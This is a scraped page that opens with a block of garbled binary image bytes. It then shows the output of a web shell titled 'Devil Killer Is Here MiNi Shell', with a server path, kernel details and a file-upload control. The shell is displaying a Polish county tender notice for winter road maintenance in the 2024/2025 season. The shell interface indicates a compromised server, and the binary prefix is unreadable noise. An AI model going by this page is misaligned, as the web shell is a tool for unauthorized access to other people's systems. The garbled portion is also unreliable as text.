JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240717/0041644901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ZIMOWE UTRZYMANIE DRÓG POWIATOWYCH W SEZONIE 2024/2025 z podziałem na 3 części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Dzierżoniowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890723835</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Garbarska 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dzierżoniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">748313129</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdp.dzierzoniow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdp.dzierzoniow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZIMOWE UTRZYMANIE DRÓG POWIATOWYCH W SEZONIE 2024/2025 z podziałem na 3 części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-15efa0dd-b644-43f3-b673-05071f894a07</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00416449</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00003696/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 ZIMOWE UTRZYMANIE DRÓG POWIATOWYCH W SEZONIE 2024/2025 z podziałem na 3 części „</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.zdp.dzierzoniow.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W przedmiotowym postępowaniu<br/>komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy Zakupowej<br/>do obsługi postępowań przetargowych dostępnej pod adresem https://zdpdzierzoniow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">:Ilekroć<br/>w dalszej części mowa o: „Platformie zakupowej” – należy przez to rozumieć narzędzie procesu<br/>związanego z udzielaniem zamówień publicznych w formie elektronicznej służące<br/>szczególności do przekazywania ofert, oświadczeń. W przedmiotowym postępowaniu Zamawiający<br/>dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków,<br/>zawiadomień orazinformacji:1. Elektronicznie na adres e-mail:sekretariat@zdp.dzierzoniow.pl lub za<br/>pośrednictwem Platformy znajdującej się pod adresem:https://zdp-dzierzoniow.ezamawiajacy.pl w<br/>zakładce„Korespondencja”.2.Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną<br/>do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze<br/>do Zamawiającego przed upływem tego terminu (godziny pracy Zamawiającego: 7.00-15.00 w<br/>dni robocze). 3. Ogólne zasady korzystania z Platformy:3.1 zgłoszenie do postępowania wymaga<br/>zalogowania Wykonawcy do Systemu na subdomenie Zarząd Dróg Powiatowych<br/>wDzierżoniowie;https://zdp-dzierzoniow.ezamawiajacy.pl<br/>lubhttps://oneplace.marketplanet.pl.3.2Wykonawca po wybraniu opcji „przystąp do postępowania”<br/>zostanie przekierowany dostronyhttps://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o<br/>możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesurejestracyjnego3. 3Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. 3.4 Po<br/>założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiający ma Wykonawcami,<br/>w szczególności zawiadomienia oraz informacje, przekazywane są w<br/>formie elektronicznej za pośrednictwem Platformy Zakupowej. 6.Zamawiający informuje, iż w<br/>przypadku<br/>jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien<br/>skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa<br/>ZDPDzierżoniów.+48 22 572223mail: oneplace@marketplanet.pl 7.Zamawiający określa<br/>dopuszczalny format kwalifikowanego podpisu elektronicznego, jako:7.1dokumenty w formacie „pdf&#34;<br/>zaleca siępodpisywaćformatemPAdES,7.2dopuszcza się podpisanie dokumentów w formacie innym<br/>niż „pdf &#34;,wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie<br/>zobowiązany załączyć prócz podpisanego dokumentu oddzielny plik z podpisem.8Zamawiający<br/>określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej<br/>tj.:8.1Stałydostęp do sieci Internet o przepustowości nie mniejszej niż 512 kb/s;8.2Komputer klasy PC<br/>lub MAC,o konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, system operacyjny - MS<br/>Windows 7 , MacOs x 10.4,Linux8.3Zainstalowana dowolna przeglądarka internetowa obsługująca TLS1.2.8.4 WłączonaobsługaJavaScript;8.5Zainstalowany program obsługujący pliki w<br/>formacie.pdf.9.Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości<br/>do 100MB w txt, rtf, pdf ,xps, odt,ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff,<br/>png,svg, wav, , mpg, mpeg, , ,mpeg4,ogg, ogv, zip, rar, tar, gz, gzip, 7z, html, xhtml, xml, xsd, gml, ,<br/>xsl,<br/>xslt,TSL, XMLsig, XAdES,CAdES,10.Zamawiający określa informacje na temat kodowania i czasu<br/>odbioru danych tj.:10.1Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny<br/>jest w Systemie, jako zaszyfrowany –format kodowania UTF8. Możliwość otworzenia pliku dostępna<br/>jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia<br/>ofert.11.Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas<br/>(hh:mm:ss)generowany wg. czasu synchronizowanego odpowiednim źródłem czasu.12.W sytuacjach<br/>awaryjnych<br/>np. w przypadku niedziałania Platformy, Zamawiający dopuszcza komunikację za pomocą poczty<br/>elektronicznej na adres:sekratariat@zdp.dzierzoniow.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zapisy dot. ochrony danych osobowych określono<br/>w załączniku nr 5 do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zapisy dot. ochrony danych osobowych określono<br/>w załączniku nr 5 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP/DT/252/P 6/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dla I części opis przedmiotu zamówienia obejmuje: wykonanie prac związanych z zimowym utrzymaniem dróg powiatowych na terenie Gminy Pieszyce w sezonie 2024/2025- I część zamówienia <br/><br/>Poniżej przedstawiamy wykaz dróg objętych zimowym utrzymaniem, z podaniem lokalizacji, długości oraz kolejności odśnieżania:<br/>Wykaz dróg powiatowych do zimowego utrzymania w Pieszycach<br/>Lp.<br/>KOLEJNOŚĆ I<br/>Lp.<br/>KOLEJNOŚĆ II<br/><br/>ulica<br/>długość<br/><br/>ulica<br/>długość<br/>1.<br/>Bielawska<br/> 2261 mb<br/>1.<br/>Droga na Bratoszów<br/>2356 mb<br/>2.<br/>Ogrodowa, Lipowa<br/>Kopernika Droga Kamionki- Przełęcz-Jugowska<br/> 13080 mb<br/>2.<br/><br/><br/>3.<br/>Piskorzowska<br/> 3743 mb<br/>3.<br/><br/><br/> RAZEM<br/>19084 mb<br/> RAZEM<br/> 2356 mb<br/> Łącznie Kilometrów 21,440<br/>Uwaga: prace związane z wykonywaniem prac przy ZUD na odcinku nowo wybudowanego ciągu pieszo rowerowego Pieszyce – Bielawa należy prowadzić bezwzględnie z użyciem lekkiego sprzętu do ZUD lub ręcznie. <br/><br/>I kolejność odpowiada II<br/>II kolejność odpowiada IV<br/>standardowi odśnieżania i usuwania gołoledzi zgodnie z załącznikiem nr l do zarządzenia Ministra Transportu i Gospodarki Morskiej z dnia 25.10.1994 r. w sprawie zasad odśnieżania i usuwania gołoledzi na drogach publicznych.<br/><br/>Zimowe utrzymanie dróg polegać będzie na:<br/>1.1pełnieniu dyżurów ZUD polegającym głownie na monitorowaniu stanu nawierzchni drogi pod kątem zimowych zjawisk atmosferycznych ;<br/>1.2 zwalczaniu gołoledzi, lodowicy i śliskości pośniegowej drogi poprzez uszorstnianie materiałami naturalnymi i z użyciem środków chemicznych;<br/>1.3 odśnieżaniu drogi, poboczy i zatok autobusowych oraz ciągu pieszo – rowerowego pomiędzy Pieszycami a Bielawą;<br/><br/>1.4 usuwaniu i wywiezieniu nadmiaru śniegu zalegającego w pasie jezdni, na przejściach dla pieszych, skrzyżowaniach;<br/>1.5 przesyłaniu raportów ZUD zgodnie z formularzem w wersji elektronicznej na wskazany adres mailowy Zamawiającemu<br/>1.6 utrzymaniu w czystości dróg w przypadku występowania korzystnych warunków atmosferycznych przy braku opadów śniegu i nie występowaniu śliskości zimowej w tym usunięcie z jezdni zalegającego piasku i innych materiałów uszorstniających po zakończeniu akcji ZUD. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w prowadzeniu akcji ZUD</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas do podjęcia działań w zakresie zwalczania śliskości lub odśnieżania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dla II części opis przedmiotu zamówienia obejmuje wykonanie prac związanych z zimowym utrzymaniem odcinka drogi<br/>powiatowej nr 3004D w sezonie 2024/2025– II część zamówienia.<br/>Wykaz dróg do zimowego utrzymania w gminie Niemcza na odcinku Piława Górna do skrzyżowania z dk 8<br/>L.p<br/>1) Kolejność II<br/>ulica<br/>długość<br/>1.<br/>gr. gmin- P. Górna/Niemcza -skrzyżowanie z dr nr 8 w Przerzeczynie Zdr.<br/>2507 mb<br/>Razem<br/>2507 mb<br/>II kolejność odpowiada III standardowi odśnieżania i usuwania gołoledzi zgodnie z załącznikiem nr 1 do zarządzenia<br/>Ministra Transportu i Gospodarki morskiej z dnia 25.10.1994 r (Dz. Urz. MTIGM nr 10 z 1995 r)<br/>Zimowe utrzymanie dróg polegać będzie na:<br/>1. Pełnieniu dyżurów ZUD polegającym głownie na monitorowaniu stanu nawierzchni drogi pod kątem zimowych zjawisk<br/>atmosferycznych.<br/>2. Zwalczaniu gołoledzi, lodowicy i śliskości pośniegowej drogi poprzez uszorstnianie materiałami naturalnymi i z użyciem<br/>środków chemicznych.<br/>3. Odśnieżaniu drogi, poboczy i zatok autobusowych oraz ciągu pieszo – rowerowego pomiędzy Piławą Górną<br/>Przerzeczynem Zdrój (dk8).<br/>4. Usuwaniu i wywiezieniu nadmiaru śniegu zalegającego w pasie jezdni, na przejściach dla pieszych, skrzyżowaniach.<br/>5. Przesyłaniu raportów ZUD zgodnie z formularzem w wersji elektronicznej na wskazany adres mailowy Zamawiającemu.<br/>6. Utrzymaniu w czystości dróg w przypadku występowania korzystnych warunków atmosferycznych przy braku opadów<br/>śniegu i nie występowaniu śliskości zimowej w tym usunięcie z jezdni zalegającego piasku i innych materiałów<br/>uszorstniających po zakończeniu akcji ZUD. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w prowadzeniu akcji ZUD</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas do podjęcia działań w zakresie zwalczania śliskości lub odśnieżania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dla III części opis przedmiotu zamówienia obejmuje: wykonanie prac związanych z zimowym utrzymaniem dróg<br/>powiatowych na terenie Gminy Bielawa w sezonie 2024/2025<br/> – III część zamówienia.<br/>Poniżej przedstawiamy wykaz dróg objętych zimowym utrzymaniem, z podaniem lokalizacji, długości oraz kolejności<br/>odśnieżania<br/>Wykaz dróg powiatowych do zimowego utrzymania w Bielawie: Lp.<br/>KOLEJNOŚĆ I<br/>Lp.<br/>KOLEJNOŚĆ II<br/>ulica<br/>długość<br/>ulica<br/>długość<br/>1.<br/>Bohaterów Getta<br/>1.308 mb<br/>1.<br/>Piławska<br/>1.624 mb<br/>2.<br/>Ostroszowicka<br/>1.438 mb<br/>2.<br/>Szewska<br/>420 mb<br/>3.W<br/>ojska Polskiego<br/>3.750 mb 4.W<br/>olności<br/>1.395 mb<br/>5.<br/>Ścieżka pieszo-rowerowa<br/>870 mb<br/>RAZEM<br/>8.761 mb<br/>RAZEM<br/>2.044 mb<br/>Razem Kilometrów 10,805<br/>I kolejność odpowiada II<br/>II kolejność odpowiada III<br/>standardowi odśnieżania i usuwania gołoledzi zgodnie z załącznikiem nr l do zarządzenia Ministra Transportu i Gospodarki<br/>Morskiej z dnia 25.10.1994 r. w sprawie zasad odśnieżania i usuwania gołoledzi na drogach publicznych.<br/>Zimowe utrzymanie dróg polegać będzie na:<br/>1.1 pełnieniu dyżurów ZUD polegającym głownie na monitorowaniu stanu nawierzchni drogi pod kątem zimowych zjawisk<br/>atmosferycznych ;<br/>1.2 zwalczaniu gołoledzi, lodowicy i śliskości pośniegowej drogi poprzez uszorstnianie materiałami naturalnymi i z użyciem<br/>środków chemicznych;<br/>1.3 odśnieżaniu drogi, poboczy i zatok autobusowych oraz ciągu pieszo – rowerowego pomiędzy Pieszycami a Bielawą.<br/>1.4 usuwaniu i wywiezieniu nadmiaru śniegu zalegającego w pasie jezdni, na przejściach dla pieszych, skrzyżowaniach;<br/>1.5 przesyłaniu raportów ZUD zgodnie z formularzem w wersji elektronicznej na wskazany adres mailowy Zamawiającemu<br/>1.6 utrzymaniu w czystości dróg w przypadku występowania korzystnych warunków atmosferycznych przy braku opadów<br/>śniegu i nie występowaniu śliskości zimowej w tym usunięcie z jezdni zalegającego piasku i innych materiałów<br/>uszorstniających po zakończeniu akcji ZUD. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span 